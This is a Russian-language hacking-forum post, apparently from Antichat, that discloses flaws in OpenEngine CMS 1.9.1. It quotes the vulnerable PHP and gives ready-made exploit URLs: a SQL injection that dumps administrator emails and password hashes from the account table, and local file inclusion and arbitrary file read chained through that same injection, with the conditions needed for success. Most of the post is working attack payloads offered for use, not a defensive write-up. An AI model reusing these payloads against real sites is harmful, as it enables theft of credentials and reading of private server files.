|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
С нами:
9428066
Репутация:
1668
|
|
Сообщение от m0Hze
Product: OpenEngine
Author: http://www.openengine.de/html/pages/de/index.htm
Version: 1.9.1
SQL-inj
/* нужны права администратора */
file: system/03_admin/ajax/index.php
PHP код:
$page_path_new = $_POST["path"];
$query = "SELECT * FROM ".$db_praefix."page WHERE page_path = '$page_path_new'";
$result = mysql_query($query);
echo mysql_num_rows($result);
target: {POST} ?path=1'+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,3,40,41,42,43,44,45,46/*
system/02_page/includes/admin.php [str:368]
PHP код:
$query = "SELECT * FROM ".$db_praefix."page WHERE (page_path = '$page_path') AND (page_status <= ".$account_status.") $access";
$result = mysql_query($query);
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,null,null,null ,null,null,null,null,null,null,concat_ws(0x3a,acco unt_email,account_password),null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null+from+oe_acco unt+where+account_group=2+--+
------------------------------------------------------------------------
*вывод в title
Интересная инъекция, далее показано что еще можно из нее выжать (:
LFI
Vuln file: system/02_page/includes/lang.php [str:48]
PHP код:
$query = "SELECT lang_short from ".$db_praefix."language order by lang_short";
$result = mysql_query($query);
closeDB($link);
while ($row = mysql_fetch_array($result))
{
$lang_list .= $row["lang_short"].",";
}
if (strlen($lang_list) > 0)
{
$lang_list = substr($lang_list,0,strlen($lang_list)-1);
}
if (isset($_GET["admin"]))
{
include("system/00_settings/language_packs/lang_".$lang_admin.".php");
}
else
{
include("system/00_settings/language_packs/lang_".$lang_input.".php");
}
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,'/../../../../../[local_file]%00',null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null+--+
------------------------------------------------------------------------
Чтение произвольных файлов
Vuln file: system/02_page/start.php [str:52]
PHP код:
$fp = fopen($incurl.$page["page_include"], "r");
if ($fp)
{
while(!feof($fp))
{
$content .= fread($fp,"10000");
}
fclose($fp);
}
echo $content;
Exploit:
------------------------------------------------------------------------
http://[host]/cms/website.php?id=xek')+union+select+null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,'../../../[local_file]',null,null,null,null,null,null,null+--+
------------------------------------------------------------------------
Для успешной эксплуатации необходимо:
magic quotes = OFF
Последний раз редактировалось RulleR; 11.12.2009 в 19:08..
|